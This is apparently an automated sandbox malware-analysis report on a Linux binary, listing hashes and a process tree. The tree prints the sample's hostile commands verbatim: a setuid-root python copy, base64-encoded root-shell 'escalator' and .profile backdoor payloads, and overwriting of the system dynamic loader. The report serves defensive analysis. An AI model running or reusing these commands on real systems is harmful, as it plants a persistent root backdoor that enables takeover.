Overview

overview

10

Static

static

10

f161292481...3f56c8

linux_amd64

5

Resubmissions

14-07-2022 15:45

220714-s61q8ahdam 10

08-07-2022 08:10

220708-j2selsgfep 5

07-07-2022 21:44

220707-1lxg3afba8 5

Analysis

  • max time kernel
    0s
  • max time network
    102s
  • platform
    linux_amd64
  • resource
    ubuntu1804-amd64-en-20211208
  • submitted
    14-07-2022 15:45

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    f1612924814ac73339f777b48b0de28b716d606e142d4d3f4308ec648e3f56c8

  • Size

    870KB

  • MD5

    67048a69a007c37f8be5d01a95f6a026

  • SHA1

    8e47e49602747f3be4d469a0c573f0362b353b61

  • SHA256

    f1612924814ac73339f777b48b0de28b716d606e142d4d3f4308ec648e3f56c8

  • SHA512

    21e6e6b330b74528b2b8c050d6b4ca98d87d4a25660f73d6978f688fdf45c9a2da457292af852eae8f8d276ddf297f2d88b00b6f7c8bba0cd05c9272eb64d21b

Score
5/10

Malware Config

Signatures

  • Reads runtime system information 8 IoCs

    Reads data from /proc virtual filesystem.

Processes

  • ./f1612924814ac73339f777b48b0de28b716d606e142d4d3f4308ec648e3f56c8
    ./f1612924814ac73339f777b48b0de28b716d606e142d4d3f4308ec648e3f56c8
    1⤵
    • Reads runtime system information
    PID:571
    • /bin/sh
      sh -c "mkdir /lib/libntpVnQE6mk"
      2⤵
        PID:572
        • /bin/mkdir
          mkdir /lib/libntpVnQE6mk
          3⤵
          • Reads runtime system information
          PID:573
      • /bin/sh
        sh -c "cp /lib/x86_64-linux-gnu/ld-2.27.so /lib/libntpVnQE6mk/.backup_ld.so"
        2⤵
          PID:574
          • /bin/cp
            cp /lib/x86_64-linux-gnu/ld-2.27.so /lib/libntpVnQE6mk/.backup_ld.so
            3⤵
            • Reads runtime system information
            PID:575
        • /bin/sh
          sh -c "ls -l /lib64/ld-linux-x86-64.so.2"
          2⤵
            PID:576
            • /bin/ls
              ls -l /lib64/ld-linux-x86-64.so.2
              3⤵
              • Reads runtime system information
              PID:577
          • /bin/sh
            sh -c "chown -R 920366:920366 /lib/libntpVnQE6mk/"
            2⤵
              PID:578
              • /bin/chown
                chown -R 920366:920366 /lib/libntpVnQE6mk/
                3⤵
                  PID:579
              • /bin/sh
                sh -c "mkdir /lib/libntpVnQE6mk/bin; cp /usr/bin/python /lib/libntpVnQE6mk/bin/python; chmod 4755 /lib/libntpVnQE6mk/bin/python"
                2⤵
                  PID:580
                  • /bin/mkdir
                    mkdir /lib/libntpVnQE6mk/bin
                    3⤵
                    • Reads runtime system information
                    PID:581
                  • /bin/cp
                    cp /usr/bin/python /lib/libntpVnQE6mk/bin/python
                    3⤵
                    • Reads runtime system information
                    PID:582
                  • /bin/chmod
                    chmod 4755 /lib/libntpVnQE6mk/bin/python
                    3⤵
                      PID:583
                  • /bin/sh
                    sh -c "echo aW1wb3J0IG9zCm9zLnNldHJldWlkKDAsMCkKb3MuZXhlY3YoIi9iaW4vYmFzaCIsICgiL2Jpbi9iYXNoIiwgIi1pIikpCg==|base64 -di > /lib/libntpVnQE6mk/bin/escalator"
                    2⤵
                      PID:584
                      • /usr/bin/base64
                        base64 -di
                        3⤵
                          PID:586
                      • /bin/sh
                        sh -c "echo IyEvYmluL2Jhc2gKaWYgWyAiJChpZCAtdSkiIC1uZSAwIF0gOyB0aGVuCiAgIGVjaG8gIldlbGNvbWUgdG8gJChob3N0bmFtZSkuIFlvdSBhcmUgR0lEICQoaWQgLWcpLCBVSUQgJChpZCAtdSkgYW5kIGFib3V0IHRvIGJlIGVzY2FsYXRlZCB0byBVSUQgMC4iCiAgIGV4ZWMgfi9iaW4vcHl0aG9uIH4vYmluL2VzY2FsYXRvcgpmaQpQUzE9J1tcdUBcaCBcV11cJCAnCg==|base64 -di > /lib/libntpVnQE6mk/.profile; chown 920366:920366 /lib/libntpVnQE6mk/.profile; chmod +x /lib/libntpVnQE6mk/.profile;ln -s /lib/libntpVnQE6mk/.profile /lib/libntpVnQE6mk/.bashrc"
                        2⤵
                          PID:587
                          • /usr/bin/base64
                            base64 -di
                            3⤵
                              PID:589
                            • /bin/chown
                              chown 920366:920366 /lib/libntpVnQE6mk/.profile
                              3⤵
                                PID:590
                              • /bin/chmod
                                chmod +x /lib/libntpVnQE6mk/.profile
                                3⤵
                                  PID:591
                                • /bin/ln
                                  ln -s /lib/libntpVnQE6mk/.profile /lib/libntpVnQE6mk/.bashrc
                                  3⤵
                                    PID:592
                                • /bin/sh
                                  sh -c "cp -p /lib/x86_64-linux-gnu/ld-2.27.so /lib/lib0UZ0LfvWZ.so"
                                  2⤵
                                    PID:593
                                    • /bin/cp
                                      cp -p /lib/x86_64-linux-gnu/ld-2.27.so /lib/lib0UZ0LfvWZ.so
                                      3⤵
                                      • Reads runtime system information
                                      PID:594
                                  • /bin/sh
                                    sh -c "mv /lib/lib0UZ0LfvWZ.so /lib/x86_64-linux-gnu/ld-2.27.so"
                                    2⤵
                                      PID:595
                                      • /bin/mv
                                        mv /lib/lib0UZ0LfvWZ.so /lib/x86_64-linux-gnu/ld-2.27.so
                                        3⤵
                                        • Reads runtime system information
                                        PID:596

                                  Network

                                  MITRE ATT&CK Matrix

                                  Replay Monitor

                                  Loading Replay Monitor...

                                  Downloads